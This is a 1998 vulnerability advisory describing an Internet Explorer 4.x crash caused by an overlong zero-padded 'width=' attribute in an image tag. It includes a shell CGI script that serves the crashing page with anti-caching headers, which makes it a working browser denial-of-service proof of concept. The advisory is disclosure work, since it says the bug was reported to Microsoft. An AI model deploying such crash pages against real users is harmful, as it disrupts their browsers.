msie4.width.000.txt

`Jim Paris <[email protected]>  
  
http://home.jtan.com/~jim/bugs/ie/width.html  
  
Internet Explorer 4.x "width=000..." bug  
  
Some versions of Microsoft Internet Explorer will crash when given a long "width=" or "height=" string in an image tag under the correct circumstances.  
In most cases, IE will stop parsing the "width=" string once the maximum width or height has been reached. When zeros are used, however, no  
maximum is reached, and the browser keeps reading the string, presumably overwriting some static buffer.  
  
This bug is hard to reproduce. It seems to work best when a new window is opened and the page is not cached. The "Expires:" line of the CGI script  
ensures that the page will not be cached, and "target=_new" is used to open a new window.  
  
This has been tested on IE 4.0 (4.71.1712.6) and 4.01SP1 (4.72.3110.8).  
  
I discovered this bug on October 17, 1998. It was reported to Microsoft on October 18.  
  
The link below points to the following CGI script:  
  
#!/bin/sh  
cat << EOF;  
Content-type: text/html  
Expires: Tue, 01 Jan 1980 00:00:00 GMT  
  
<html><head><title>IE "width=000..." bug</title></head><body>  
<img width=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001>  
Your browser is unaffected by this bug.  
You can close this window.  
</body></html>  
EOF  
`